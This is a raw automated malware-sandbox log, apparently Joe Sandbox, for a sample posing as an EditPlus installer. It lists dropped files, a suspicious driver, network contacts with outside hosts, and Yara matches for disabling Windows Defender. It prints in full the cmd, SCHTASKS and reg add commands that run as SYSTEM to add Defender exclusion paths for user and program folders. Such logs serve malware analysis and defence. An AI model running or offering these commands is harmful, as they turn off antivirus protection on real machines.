Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 0b1G0H.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 0b1G0H.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: 0b1G0H.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 138745635-72645747.116.exe, 00000000.00000003.1904098242.0000000000595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vien3h.oss-cn-beijing.aliyuncs.com/i.datZ
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: 138745635-72645747.116.exeString found in binary or memory: https://www.editplus.com.Congratulations
Source: 138745635-72645747.116.exeString found in binary or memory: https://www.editplus.com/
Source: 138745635-72645747.116.exeString found in binary or memory: https://www.editplus.com/PublisherES-ComputingUninstallStringDisplayName
Source: 138745635-72645747.116.exeString found in binary or memory: https://www.editplus.com/kr
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:49755 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 4.2.0b1G0H.exe.28c0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
PE file contains section with special chars
Source: tbcore3U.dll.5.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.5.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.5.drStatic PE information: section name: .mo:
Source: tbcore3U.dll.39.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.39.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.39.drStatic PE information: section name: .mo:
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140006C95 NtAllocateVirtualMemory,4_2_0000000140006C95
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
Source: C:\Users\user\Desktop\138745635-72645747.116.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_000000014000C3F04_2_000000014000C3F0
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_000000014000CC004_2_000000014000CC00
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140001A304_2_0000000140001A30
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_000000014000C2A04_2_000000014000C2A0
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00000001400022C04_2_00000001400022C0
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00000001400110F04_2_00000001400110F0
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140010CF04_2_0000000140010CF0
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00000001400093004_2_0000000140009300
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_000000014000BB704_2_000000014000BB70
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140003F804_2_0000000140003F80
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00000001400103D04_2_00000001400103D0
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00007FFE1A5302484_2_00007FFE1A530248
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00007FFE1A52A1B84_2_00007FFE1A52A1B8
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCode function: 40_2_00984AE240_2_00984AE2
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeCode function: 41_2_00B54AE241_2_00B54AE2
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 138745635-72645747.116.exe
Source: 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 138745635-72645747.116.exe
Source: 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 138745635-72645747.116.exe
Source: 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 138745635-72645747.116.exe
Source: 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 138745635-72645747.116.exe
Source: 138745635-72645747.116.exe, 00000000.00000000.1780256362.0000000141D74000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSETUP.EXE> vs 138745635-72645747.116.exe
Source: 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 138745635-72645747.116.exe
Source: 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 138745635-72645747.116.exe
Source: 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 138745635-72645747.116.exe
Source: 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 138745635-72645747.116.exe
Source: 138745635-72645747.116.exeBinary or memory string: OriginalFilenameSETUP.EXE> vs 138745635-72645747.116.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: 4.2.0b1G0H.exe.28c0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal100.evad.winEXE@70/23@32/3
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,4_2_0000000140003F80
Source: C:\Users\user\Documents\0b1G0H.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,4_2_0000000140001430
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
Source: C:\Users\user\Documents\0b1G0H.exeFile created: C:\Program Files (x86)\NEiV2VJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeFile created: C:\Users\user\Documents\0b1G0H.exeJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMutant created: \Sessions\1\BaseNamedObjects\aefd_768287
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMutant created: \Sessions\1\BaseNamedObjects\8.217.35.253:8917:Sauron
Source: C:\Users\user\Desktop\138745635-72645747.116.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5012:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7976:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Users\user\Documents\0b1G0H.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeMutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCommand line argument: tbcore3.dll40_2_00981000
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCommand line argument: tbcore3.dll40_2_00981000
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCommand line argument: tbcore3U.dll40_2_00981000
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeCommand line argument: tbcore3U.dll40_2_00981000
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeCommand line argument: tbcore3.dll41_2_00B51000
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeCommand line argument: tbcore3.dll41_2_00B51000
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeCommand line argument: tbcore3U.dll41_2_00B51000
Source: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exeCommand line argument: tbcore3U.dll41_2_00B51000
Source: 138745635-72645747.116.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Documents\0b1G0H.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\138745635-72645747.116.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 138745635-72645747.116.exeVirustotal: Detection: 15%
Source: C:\Users\user\Desktop\138745635-72645747.116.exeFile read: C:\Users\user\Desktop\138745635-72645747.116.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\138745635-72645747.116.exe "C:\Users\user\Desktop\138745635-72645747.116.exe"
Source: unknownProcess created: C:\Users\user\Documents\0b1G0H.exe C:\Users\user\Documents\0b1G0H.exe
Source: unknownProcess created: C:\Users\user\Documents\0b1G0H.exe C:\Users\user\Documents\0b1G0H.exe
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\0b1G0H.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
